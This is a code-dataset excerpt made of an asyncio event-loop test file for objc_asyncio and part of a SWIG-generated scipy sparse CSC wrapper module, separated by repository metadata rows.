nose.runmodule()
| 52.126844 | 417 | 0.680946 | 1,827 | 17,671 | 6.226601 | 0.108922 | 0.14135 | 0.140471 | 0.030063 | 0.808456 | 0.7827 | 0.762131 | 0.749648 | 0.702795 | 0.702795 | 0 | 0.126771 | 0.253183 | 17,671 | 338 | 418 | 52.281065 | 0.735243 | 0.01726 | 0 | 0.728938 | 0 | 0 | 0.110861 | 0.089542 | 0 | 0 | 0 | 0 | 0.490842 | 1 | 0.03663 | false | 0 | 0.043956 | 0 | 0.091575 | 0.003663 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
bea5b03a386dd6fe16c39870d1072e93ec77bcf0 | 4,339 | py | Python | testsuite/test_calling.py | ronaldoussoren/objc_asyncio | 89e573fd4c95592515ea8c8a4abfeebdd261fde2 | [
"MIT-0"
] | 2 | 2021-02-20T22:10:54.000Z | 2021-03-26T21:45:06.000Z | testsuite/test_calling.py | ronaldoussoren/objc_asyncio | 89e573fd4c95592515ea8c8a4abfeebdd261fde2 | [
"MIT-0"
] | null | null | null | testsuite/test_calling.py | ronaldoussoren/objc_asyncio | 89e573fd4c95592515ea8c8a4abfeebdd261fde2 | [
"MIT-0"
] | null | null | null | import asyncio
import time
from . import utils
class TestFutureCalling(utils.TestCase):
def test_time(self):
self.assertAlmostEqual(self.loop.time(), time.time(), 2)
def test_call_later(self):
end_time = None
arg_tuple = None
def callback(*args):
nonlocal end_time, arg_tuple
arg_tuple = args
end_time = time.time()
async def wait(seconds):
await asyncio.sleep(seconds)
start_time = time.time()
handle = self.loop.call_later(0.5, callback, 1, 2)
self.assertIsInstance(handle, asyncio.Handle)
self.loop.run_until_complete(wait(2))
self.assertAlmostEqual(end_time - start_time, 0.5, 1)
self.assertEqual(arg_tuple, (1, 2))
def test_call_at(self):
end_time = None
arg_tuple = None
def callback(*args):
nonlocal end_time, arg_tuple
arg_tuple = args
end_time = time.time()
async def wait(seconds):
await asyncio.sleep(seconds)
start_time = time.time()
scheduled_time = start_time + 0.5
handle = self.loop.call_at(scheduled_time, callback, 1, 2)
self.assertIsInstance(handle, asyncio.Handle)
self.loop.run_until_complete(wait(2))
self.assertAlmostEqual(end_time, scheduled_time, 1)
self.assertEqual(arg_tuple, (1, 2))
def test_call_soon(self):
arg_tuple = None
def callback(*args):
nonlocal arg_tuple
arg_tuple = args
async def wait1():
await asyncio.sleep(0.5)
async def wait2():
self.loop.call_soon(callback, 3, 4)
await asyncio.sleep(0.5)
handle = self.loop.call_soon(callback, 1, 2)
self.assertIsInstance(handle, asyncio.Handle)
self.loop.run_until_complete(wait1())
self.assertEqual(arg_tuple, (1, 2))
self.loop.run_until_complete(wait2())
self.assertEqual(arg_tuple, (3, 4))
def test_call_soon_threadsafe(self):
arg_tuple = None
def callback(*args):
nonlocal arg_tuple
arg_tuple = args
async def wait1():
await asyncio.sleep(0.5)
async def wait2():
self.loop.call_soon_threadsafe(callback, 3, 4)
await asyncio.sleep(0.5)
handle = self.loop.call_soon(callback, 1, 2)
self.assertIsInstance(handle, asyncio.Handle)
self.loop.run_until_complete(wait1())
self.assertEqual(arg_tuple, (1, 2))
self.loop.run_until_complete(wait2())
self.assertEqual(arg_tuple, (3, 4))
def test_calling_with_cancel(self):
arg_tuple = None
def callback(*args):
nonlocal arg_tuple
arg_tuple = args
async def wait():
await asyncio.sleep(1.0)
with self.subTest("call_soon"):
handle = self.loop.call_soon(callback, 1, 2)
handle.cancel()
self.loop.run_until_complete(wait())
self.assertEqual(arg_tuple, None)
arg_tuple = None
with self.subTest("call_soon_threadsafe"):
handle = self.loop.call_soon_threadsafe(callback, 1, 2)
handle.cancel()
self.loop.run_until_complete(wait())
self.assertEqual(arg_tuple, None)
arg_tuple = None
with self.subTest("call_later"):
handle = self.loop.call_later(0.5, callback, 1, 2)
handle.cancel()
self.loop.run_until_complete(wait())
self.assertEqual(arg_tuple, None)
arg_tuple = None
with self.subTest("call_at"):
handle = self.loop.call_at(time.time() + 0.8, callback, 1, 2)
handle.cancel()
self.loop.run_until_complete(wait())
self.assertEqual(arg_tuple, None)
arg_tuple = None
with self.subTest("call_later with multiple jobs"):
self.loop.call_later(0.3, callback, 1, 2)
self.loop.call_later(0.3, callback, 3, 4)
# XXX: This is a crude hack to hit some code for testing...
self.loop._timer_q[1].cancel()
self.loop.run_until_complete(wait())
self.assertIsNot(arg_tuple, None)
arg_tuple = None
| 28.359477 | 73 | 0.587693 | 541 | 4,339 | 4.523105 | 0.125693 | 0.101349 | 0.073559 | 0.071925 | 0.854924 | 0.82264 | 0.789947 | 0.767879 | 0.743359 | 0.743359 | 0 | 0.024675 | 0.308827 | 4,339 | 152 | 74 | 28.546053 | 0.791264 | 0.013137 | 0 | 0.719626 | 0 | 0 | 0.017523 | 0 | 0 | 0 | 0 | 0 | 0.168224 | 1 | 0.102804 | false | 0 | 0.028037 | 0 | 0.140187 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fe2cd6fbad51c9946145acb950228e5859994781 | 48,087 | py | Python | dist-packages/scipy/sparse/sparsetools/csc.py | Jianwei-Wang/python2.7_lib | 911b8e81512e5ac5f13e669ab46f7693ed897378 | [
"PSF-2.0"
] | null | null | null | dist-packages/scipy/sparse/sparsetools/csc.py | Jianwei-Wang/python2.7_lib | 911b8e81512e5ac5f13e669ab46f7693ed897378 | [
"PSF-2.0"
] | null | null | null | dist-packages/scipy/sparse/sparsetools/csc.py | Jianwei-Wang/python2.7_lib | 911b8e81512e5ac5f13e669ab46f7693ed897378 | [
"PSF-2.0"
] | null | null | null | # This file was automatically generated by SWIG (http://www.swig.org).
# Version 2.0.11
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info
if version_info >= (2,6,0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_csc', [dirname(__file__)])
except ImportError:
import _csc
return _csc
if fp is not None:
try:
_mod = imp.load_module('_csc', fp, pathname, description)
finally:
fp.close()
return _mod
_csc = swig_import_helper()
del swig_import_helper
else:
import _csc
del version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self,class_type,name,value,static=1):
if (name == "thisown"): return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name,None)
if method: return method(self,value)
if (not static):
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self,class_type,name,value):
return _swig_setattr_nondynamic(self,class_type,name,value,0)
def _swig_getattr(self,class_type,name):
if (name == "thisown"): return self.this.own()
method = class_type.__swig_getmethods__.get(name,None)
if method: return method(self)
raise AttributeError(name)
def _swig_repr(self):
try: strthis = "proxy of " + self.this.__repr__()
except: strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except AttributeError:
class _object : pass
_newclass = 0
def csc_matmat_pass1(*args):
"""
csc_matmat_pass1(int const n_row, int const n_col, int const [] Ap, int const [] Ai, int const [] Bp,
int const [] Bi, int [] Cp)
"""
return _csc.csc_matmat_pass1(*args)
def csc_diagonal(*args):
"""
csc_diagonal(int const n_row, int const n_col, int const [] Ap, int const [] Aj, npy_bool_wrapper const [] Ax,
npy_bool_wrapper [] Yx)
csc_diagonal(int const n_row, int const n_col, int const [] Ap, int const [] Aj, signed char const [] Ax,
signed char [] Yx)
csc_diagonal(int const n_row, int const n_col, int const [] Ap, int const [] Aj, unsigned char const [] Ax,
unsigned char [] Yx)
csc_diagonal(int const n_row, int const n_col, int const [] Ap, int const [] Aj, short const [] Ax,
short [] Yx)
csc_diagonal(int const n_row, int const n_col, int const [] Ap, int const [] Aj, unsigned short const [] Ax,
unsigned short [] Yx)
csc_diagonal(int const n_row, int const n_col, int const [] Ap, int const [] Aj, int const [] Ax,
int [] Yx)
csc_diagonal(int const n_row, int const n_col, int const [] Ap, int const [] Aj, unsigned int const [] Ax,
unsigned int [] Yx)
csc_diagonal(int const n_row, int const n_col, int const [] Ap, int const [] Aj, long long const [] Ax,
long long [] Yx)
csc_diagonal(int const n_row, int const n_col, int const [] Ap, int const [] Aj, unsigned long long const [] Ax,
unsigned long long [] Yx)
csc_diagonal(int const n_row, int const n_col, int const [] Ap, int const [] Aj, float const [] Ax,
float [] Yx)
csc_diagonal(int const n_row, int const n_col, int const [] Ap, int const [] Aj, double const [] Ax,
double [] Yx)
csc_diagonal(int const n_row, int const n_col, int const [] Ap, int const [] Aj, long double const [] Ax,
long double [] Yx)
csc_diagonal(int const n_row, int const n_col, int const [] Ap, int const [] Aj, npy_cfloat_wrapper const [] Ax,
npy_cfloat_wrapper [] Yx)
csc_diagonal(int const n_row, int const n_col, int const [] Ap, int const [] Aj, npy_cdouble_wrapper const [] Ax,
npy_cdouble_wrapper [] Yx)
csc_diagonal(int const n_row, int const n_col, int const [] Ap, int const [] Aj, npy_clongdouble_wrapper const [] Ax,
npy_clongdouble_wrapper [] Yx)
"""
return _csc.csc_diagonal(*args)
def csc_tocsr(*args):
"""
csc_tocsr(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_bool_wrapper const [] Ax,
int [] Bp, int [] Bj, npy_bool_wrapper [] Bx)
csc_tocsr(int const n_row, int const n_col, int const [] Ap, int const [] Ai, signed char const [] Ax,
int [] Bp, int [] Bj, signed char [] Bx)
csc_tocsr(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned char const [] Ax,
int [] Bp, int [] Bj, unsigned char [] Bx)
csc_tocsr(int const n_row, int const n_col, int const [] Ap, int const [] Ai, short const [] Ax,
int [] Bp, int [] Bj, short [] Bx)
csc_tocsr(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned short const [] Ax,
int [] Bp, int [] Bj, unsigned short [] Bx)
csc_tocsr(int const n_row, int const n_col, int const [] Ap, int const [] Ai, int const [] Ax,
int [] Bp, int [] Bj, int [] Bx)
csc_tocsr(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned int const [] Ax,
int [] Bp, int [] Bj, unsigned int [] Bx)
csc_tocsr(int const n_row, int const n_col, int const [] Ap, int const [] Ai, long long const [] Ax,
int [] Bp, int [] Bj, long long [] Bx)
csc_tocsr(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned long long const [] Ax,
int [] Bp, int [] Bj, unsigned long long [] Bx)
csc_tocsr(int const n_row, int const n_col, int const [] Ap, int const [] Ai, float const [] Ax,
int [] Bp, int [] Bj, float [] Bx)
csc_tocsr(int const n_row, int const n_col, int const [] Ap, int const [] Ai, double const [] Ax,
int [] Bp, int [] Bj, double [] Bx)
csc_tocsr(int const n_row, int const n_col, int const [] Ap, int const [] Ai, long double const [] Ax,
int [] Bp, int [] Bj, long double [] Bx)
csc_tocsr(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_cfloat_wrapper const [] Ax,
int [] Bp, int [] Bj, npy_cfloat_wrapper [] Bx)
csc_tocsr(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_cdouble_wrapper const [] Ax,
int [] Bp, int [] Bj, npy_cdouble_wrapper [] Bx)
csc_tocsr(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_clongdouble_wrapper const [] Ax,
int [] Bp, int [] Bj, npy_clongdouble_wrapper [] Bx)
"""
return _csc.csc_tocsr(*args)
def csc_matmat_pass2(*args):
"""
csc_matmat_pass2(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_bool_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_bool_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_matmat_pass2(int const n_row, int const n_col, int const [] Ap, int const [] Ai, signed char const [] Ax,
int const [] Bp, int const [] Bi, signed char const [] Bx, int [] Cp,
int [] Ci, signed char [] Cx)
csc_matmat_pass2(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned char const [] Ax,
int const [] Bp, int const [] Bi, unsigned char const [] Bx,
int [] Cp, int [] Ci, unsigned char [] Cx)
csc_matmat_pass2(int const n_row, int const n_col, int const [] Ap, int const [] Ai, short const [] Ax,
int const [] Bp, int const [] Bi, short const [] Bx, int [] Cp, int [] Ci,
short [] Cx)
csc_matmat_pass2(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned short const [] Ax,
int const [] Bp, int const [] Bi, unsigned short const [] Bx,
int [] Cp, int [] Ci, unsigned short [] Cx)
csc_matmat_pass2(int const n_row, int const n_col, int const [] Ap, int const [] Ai, int const [] Ax,
int const [] Bp, int const [] Bi, int const [] Bx, int [] Cp, int [] Ci,
int [] Cx)
csc_matmat_pass2(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned int const [] Ax,
int const [] Bp, int const [] Bi, unsigned int const [] Bx, int [] Cp,
int [] Ci, unsigned int [] Cx)
csc_matmat_pass2(int const n_row, int const n_col, int const [] Ap, int const [] Ai, long long const [] Ax,
int const [] Bp, int const [] Bi, long long const [] Bx, int [] Cp,
int [] Ci, long long [] Cx)
csc_matmat_pass2(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned long long const [] Ax,
int const [] Bp, int const [] Bi, unsigned long long const [] Bx,
int [] Cp, int [] Ci, unsigned long long [] Cx)
csc_matmat_pass2(int const n_row, int const n_col, int const [] Ap, int const [] Ai, float const [] Ax,
int const [] Bp, int const [] Bi, float const [] Bx, int [] Cp, int [] Ci,
float [] Cx)
csc_matmat_pass2(int const n_row, int const n_col, int const [] Ap, int const [] Ai, double const [] Ax,
int const [] Bp, int const [] Bi, double const [] Bx, int [] Cp, int [] Ci,
double [] Cx)
csc_matmat_pass2(int const n_row, int const n_col, int const [] Ap, int const [] Ai, long double const [] Ax,
int const [] Bp, int const [] Bi, long double const [] Bx, int [] Cp,
int [] Ci, long double [] Cx)
csc_matmat_pass2(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_cfloat_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_cfloat_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_cfloat_wrapper [] Cx)
csc_matmat_pass2(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_cdouble_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_cdouble_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_cdouble_wrapper [] Cx)
csc_matmat_pass2(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_clongdouble_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_clongdouble_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_clongdouble_wrapper [] Cx)
"""
return _csc.csc_matmat_pass2(*args)
def csc_matvec(*args):
"""
csc_matvec(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_bool_wrapper const [] Ax,
npy_bool_wrapper const [] Xx, npy_bool_wrapper [] Yx)
csc_matvec(int const n_row, int const n_col, int const [] Ap, int const [] Ai, signed char const [] Ax,
signed char const [] Xx, signed char [] Yx)
csc_matvec(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned char const [] Ax,
unsigned char const [] Xx, unsigned char [] Yx)
csc_matvec(int const n_row, int const n_col, int const [] Ap, int const [] Ai, short const [] Ax,
short const [] Xx, short [] Yx)
csc_matvec(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned short const [] Ax,
unsigned short const [] Xx, unsigned short [] Yx)
csc_matvec(int const n_row, int const n_col, int const [] Ap, int const [] Ai, int const [] Ax,
int const [] Xx, int [] Yx)
csc_matvec(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned int const [] Ax,
unsigned int const [] Xx, unsigned int [] Yx)
csc_matvec(int const n_row, int const n_col, int const [] Ap, int const [] Ai, long long const [] Ax,
long long const [] Xx, long long [] Yx)
csc_matvec(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned long long const [] Ax,
unsigned long long const [] Xx, unsigned long long [] Yx)
csc_matvec(int const n_row, int const n_col, int const [] Ap, int const [] Ai, float const [] Ax,
float const [] Xx, float [] Yx)
csc_matvec(int const n_row, int const n_col, int const [] Ap, int const [] Ai, double const [] Ax,
double const [] Xx, double [] Yx)
csc_matvec(int const n_row, int const n_col, int const [] Ap, int const [] Ai, long double const [] Ax,
long double const [] Xx, long double [] Yx)
csc_matvec(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_cfloat_wrapper const [] Ax,
npy_cfloat_wrapper const [] Xx, npy_cfloat_wrapper [] Yx)
csc_matvec(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_cdouble_wrapper const [] Ax,
npy_cdouble_wrapper const [] Xx, npy_cdouble_wrapper [] Yx)
csc_matvec(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_clongdouble_wrapper const [] Ax,
npy_clongdouble_wrapper const [] Xx, npy_clongdouble_wrapper [] Yx)
"""
return _csc.csc_matvec(*args)
def csc_matvecs(*args):
"""
csc_matvecs(int const n_row, int const n_col, int const n_vecs, int const [] Ap, int const [] Ai,
npy_bool_wrapper const [] Ax, npy_bool_wrapper const [] Xx, npy_bool_wrapper [] Yx)
csc_matvecs(int const n_row, int const n_col, int const n_vecs, int const [] Ap, int const [] Ai,
signed char const [] Ax, signed char const [] Xx, signed char [] Yx)
csc_matvecs(int const n_row, int const n_col, int const n_vecs, int const [] Ap, int const [] Ai,
unsigned char const [] Ax, unsigned char const [] Xx, unsigned char [] Yx)
csc_matvecs(int const n_row, int const n_col, int const n_vecs, int const [] Ap, int const [] Ai,
short const [] Ax, short const [] Xx, short [] Yx)
csc_matvecs(int const n_row, int const n_col, int const n_vecs, int const [] Ap, int const [] Ai,
unsigned short const [] Ax, unsigned short const [] Xx, unsigned short [] Yx)
csc_matvecs(int const n_row, int const n_col, int const n_vecs, int const [] Ap, int const [] Ai,
int const [] Ax, int const [] Xx, int [] Yx)
csc_matvecs(int const n_row, int const n_col, int const n_vecs, int const [] Ap, int const [] Ai,
unsigned int const [] Ax, unsigned int const [] Xx, unsigned int [] Yx)
csc_matvecs(int const n_row, int const n_col, int const n_vecs, int const [] Ap, int const [] Ai,
long long const [] Ax, long long const [] Xx, long long [] Yx)
csc_matvecs(int const n_row, int const n_col, int const n_vecs, int const [] Ap, int const [] Ai,
unsigned long long const [] Ax, unsigned long long const [] Xx, unsigned long long [] Yx)
csc_matvecs(int const n_row, int const n_col, int const n_vecs, int const [] Ap, int const [] Ai,
float const [] Ax, float const [] Xx, float [] Yx)
csc_matvecs(int const n_row, int const n_col, int const n_vecs, int const [] Ap, int const [] Ai,
double const [] Ax, double const [] Xx, double [] Yx)
csc_matvecs(int const n_row, int const n_col, int const n_vecs, int const [] Ap, int const [] Ai,
long double const [] Ax, long double const [] Xx, long double [] Yx)
csc_matvecs(int const n_row, int const n_col, int const n_vecs, int const [] Ap, int const [] Ai,
npy_cfloat_wrapper const [] Ax, npy_cfloat_wrapper const [] Xx, npy_cfloat_wrapper [] Yx)
csc_matvecs(int const n_row, int const n_col, int const n_vecs, int const [] Ap, int const [] Ai,
npy_cdouble_wrapper const [] Ax, npy_cdouble_wrapper const [] Xx, npy_cdouble_wrapper [] Yx)
csc_matvecs(int const n_row, int const n_col, int const n_vecs, int const [] Ap, int const [] Ai,
npy_clongdouble_wrapper const [] Ax, npy_clongdouble_wrapper const [] Xx,
npy_clongdouble_wrapper [] Yx)
"""
return _csc.csc_matvecs(*args)
def csc_elmul_csc(*args):
"""
csc_elmul_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_bool_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_bool_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_elmul_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, signed char const [] Ax,
int const [] Bp, int const [] Bi, signed char const [] Bx, int [] Cp,
int [] Ci, signed char [] Cx)
csc_elmul_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned char const [] Ax,
int const [] Bp, int const [] Bi, unsigned char const [] Bx,
int [] Cp, int [] Ci, unsigned char [] Cx)
csc_elmul_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, short const [] Ax,
int const [] Bp, int const [] Bi, short const [] Bx, int [] Cp, int [] Ci,
short [] Cx)
csc_elmul_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned short const [] Ax,
int const [] Bp, int const [] Bi, unsigned short const [] Bx,
int [] Cp, int [] Ci, unsigned short [] Cx)
csc_elmul_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, int const [] Ax,
int const [] Bp, int const [] Bi, int const [] Bx, int [] Cp, int [] Ci,
int [] Cx)
csc_elmul_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned int const [] Ax,
int const [] Bp, int const [] Bi, unsigned int const [] Bx, int [] Cp,
int [] Ci, unsigned int [] Cx)
csc_elmul_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, long long const [] Ax,
int const [] Bp, int const [] Bi, long long const [] Bx, int [] Cp,
int [] Ci, long long [] Cx)
csc_elmul_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned long long const [] Ax,
int const [] Bp, int const [] Bi, unsigned long long const [] Bx,
int [] Cp, int [] Ci, unsigned long long [] Cx)
csc_elmul_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, float const [] Ax,
int const [] Bp, int const [] Bi, float const [] Bx, int [] Cp, int [] Ci,
float [] Cx)
csc_elmul_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, double const [] Ax,
int const [] Bp, int const [] Bi, double const [] Bx, int [] Cp, int [] Ci,
double [] Cx)
csc_elmul_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, long double const [] Ax,
int const [] Bp, int const [] Bi, long double const [] Bx, int [] Cp,
int [] Ci, long double [] Cx)
csc_elmul_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_cfloat_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_cfloat_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_cfloat_wrapper [] Cx)
csc_elmul_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_cdouble_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_cdouble_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_cdouble_wrapper [] Cx)
csc_elmul_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_clongdouble_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_clongdouble_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_clongdouble_wrapper [] Cx)
"""
return _csc.csc_elmul_csc(*args)
def csc_eldiv_csc(*args):
"""
csc_eldiv_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_bool_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_bool_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_eldiv_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, signed char const [] Ax,
int const [] Bp, int const [] Bi, signed char const [] Bx, int [] Cp,
int [] Ci, signed char [] Cx)
csc_eldiv_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned char const [] Ax,
int const [] Bp, int const [] Bi, unsigned char const [] Bx,
int [] Cp, int [] Ci, unsigned char [] Cx)
csc_eldiv_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, short const [] Ax,
int const [] Bp, int const [] Bi, short const [] Bx, int [] Cp, int [] Ci,
short [] Cx)
csc_eldiv_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned short const [] Ax,
int const [] Bp, int const [] Bi, unsigned short const [] Bx,
int [] Cp, int [] Ci, unsigned short [] Cx)
csc_eldiv_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, int const [] Ax,
int const [] Bp, int const [] Bi, int const [] Bx, int [] Cp, int [] Ci,
int [] Cx)
csc_eldiv_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned int const [] Ax,
int const [] Bp, int const [] Bi, unsigned int const [] Bx, int [] Cp,
int [] Ci, unsigned int [] Cx)
csc_eldiv_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, long long const [] Ax,
int const [] Bp, int const [] Bi, long long const [] Bx, int [] Cp,
int [] Ci, long long [] Cx)
csc_eldiv_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned long long const [] Ax,
int const [] Bp, int const [] Bi, unsigned long long const [] Bx,
int [] Cp, int [] Ci, unsigned long long [] Cx)
csc_eldiv_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, float const [] Ax,
int const [] Bp, int const [] Bi, float const [] Bx, int [] Cp, int [] Ci,
float [] Cx)
csc_eldiv_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, double const [] Ax,
int const [] Bp, int const [] Bi, double const [] Bx, int [] Cp, int [] Ci,
double [] Cx)
csc_eldiv_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, long double const [] Ax,
int const [] Bp, int const [] Bi, long double const [] Bx, int [] Cp,
int [] Ci, long double [] Cx)
csc_eldiv_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_cfloat_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_cfloat_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_cfloat_wrapper [] Cx)
csc_eldiv_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_cdouble_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_cdouble_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_cdouble_wrapper [] Cx)
csc_eldiv_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_clongdouble_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_clongdouble_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_clongdouble_wrapper [] Cx)
"""
return _csc.csc_eldiv_csc(*args)
def csc_plus_csc(*args):
"""
csc_plus_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_bool_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_bool_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_bool_wrapper [] Cx)
csc_plus_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, signed char const [] Ax,
int const [] Bp, int const [] Bi, signed char const [] Bx, int [] Cp,
int [] Ci, signed char [] Cx)
csc_plus_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned char const [] Ax,
int const [] Bp, int const [] Bi, unsigned char const [] Bx,
int [] Cp, int [] Ci, unsigned char [] Cx)
csc_plus_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, short const [] Ax,
int const [] Bp, int const [] Bi, short const [] Bx, int [] Cp, int [] Ci,
short [] Cx)
csc_plus_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned short const [] Ax,
int const [] Bp, int const [] Bi, unsigned short const [] Bx,
int [] Cp, int [] Ci, unsigned short [] Cx)
csc_plus_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, int const [] Ax,
int const [] Bp, int const [] Bi, int const [] Bx, int [] Cp, int [] Ci,
int [] Cx)
csc_plus_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned int const [] Ax,
int const [] Bp, int const [] Bi, unsigned int const [] Bx, int [] Cp,
int [] Ci, unsigned int [] Cx)
csc_plus_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, long long const [] Ax,
int const [] Bp, int const [] Bi, long long const [] Bx, int [] Cp,
int [] Ci, long long [] Cx)
csc_plus_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, unsigned long long const [] Ax,
int const [] Bp, int const [] Bi, unsigned long long const [] Bx,
int [] Cp, int [] Ci, unsigned long long [] Cx)
csc_plus_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, float const [] Ax,
int const [] Bp, int const [] Bi, float const [] Bx, int [] Cp, int [] Ci,
float [] Cx)
csc_plus_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, double const [] Ax,
int const [] Bp, int const [] Bi, double const [] Bx, int [] Cp, int [] Ci,
double [] Cx)
csc_plus_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, long double const [] Ax,
int const [] Bp, int const [] Bi, long double const [] Bx, int [] Cp,
int [] Ci, long double [] Cx)
csc_plus_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_cfloat_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_cfloat_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_cfloat_wrapper [] Cx)
csc_plus_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_cdouble_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_cdouble_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_cdouble_wrapper [] Cx)
csc_plus_csc(int const n_row, int const n_col, int const [] Ap, int const [] Ai, npy_clongdouble_wrapper const [] Ax,
int const [] Bp, int const [] Bi, npy_clongdouble_wrapper const [] Bx,
int [] Cp, int [] Ci, npy_clongdouble_wrapper [] Cx)
"""
